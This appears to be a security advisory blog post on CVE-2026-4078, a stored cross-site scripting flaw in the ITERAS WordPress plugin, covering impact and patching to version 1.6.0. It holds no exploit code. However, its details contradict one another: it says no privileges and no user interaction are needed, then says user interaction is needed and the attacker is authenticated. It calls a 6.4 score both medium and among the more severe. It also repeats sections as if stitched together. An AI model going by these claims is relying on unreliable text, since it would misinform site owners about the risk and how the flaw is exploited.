Overview of CVE-2026-4078
A stored Cross-Site Scripting vulnerability affects the ITERAS plugin. This flaw has a CVSS score of 6.4. It is a medium-severity issue with a higher impact. The attacker can inject persistent scripts into your site. These scripts execute automatically for all users.
The ITERAS plugin stores user input without proper sanitization. It outputs the unsafe data directly into web pages. This allows arbitrary JavaScript execution. The attack does not require any user interaction to trigger.
Technical Details
The vulnerability exists in multiple input fields of the ITERAS plugin. The plugin accepts data through forms and API endpoints. It fails to escape HTML entities before rendering pages. Attackers can inject script tags, event handlers, and other HTML.
The CVSS vector is AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N. The attack is network-based with low complexity. It requires user interaction for initial injection. However, the stored payload affects others without interaction. The confidentiality impact is high.
Stored XSS vulnerabilities are the most dangerous type. The malicious code persists in the database. Every visitor to the affected page gets attacked. The cleanup requires removing the injected content from storage.
Impact on Your Site
Attackers can steal session cookies and authentication tokens. They can log keystrokes and capture form data. They can redirect users to malicious websites. They can also modify page content in real time.
The CVSS score of 6.4 indicates a higher severity. This is due to the changed scope (S in the vector). The attack impacts resources beyond the vulnerable component. It affects the entire web application and its users.
Your site visitors face serious risks. Their personal data and login credentials are at risk. Your websiteā€™s reputation suffers too. Search engines may blacklist your site for serving malware.
How to Fix It
Update the ITERAS plugin to the latest version right now. The developer has fixed the input sanitization issue. Check your WordPress plugins page for the update. Install it immediately to close the vulnerability.
In the meantime, disable the ITERAS plugin if possible. This is the safest option until you update. Use a web application firewall to block XSS attacks. Add a Content Security Policy header to your site. This limits what scripts can execute.
Scan your site for existing malicious content. Use a WordPress security scanner. Look for suspicious script tags in your database. Remove any injected code you discover.
Conclusion
CVE-2026-4078 is a stored XSS vulnerability in ITERAS. The CVSS score of 6.4 makes it one of the more severe issues. Stored XSS attacks can compromise your entire site. They put all your visitors at risk.
Do not delay the security update. Every moment your plugin remains unpatched is a risk. Apply the fix now and scan your database for threats. Keep all your WordPress plugins updated for safety.
What Is ITERAS?
ITERAS is a WordPress plugin for creating interactive timelines and progress tracking. Project managers, educators, and content creators use it to display chronological content. It stores timeline entries and media uploads in the WordPress database.
Stored XSS in a content plugin means any user who can submit content can inject malicious scripts.
CVE-2026-4078 Details
CVE-2026-4078 is a stored Cross-Site Scripting vulnerability. The plugin does not properly sanitize user-submitted content before storing it. When other users view the timeline, the injected script executes in their browsers.
The CVSS score is 6.4 (Medium). An authenticated attacker can steal cookies, redirect visitors, or deface the timeline page. The injected content remains in the database until manually removed.
Affected Versions and Fix
All versions of ITERAS below 1.6.0 are vulnerable. The patch in version 1.6.0 adds proper input validation and output escaping across all timeline entry fields.
Update to version 1.6.0 from your WordPress dashboard. After updating, audit your timeline entries for any suspicious content added before the patch.
The ITERAS plugin is available on wordpress.org/plugins/iteras/.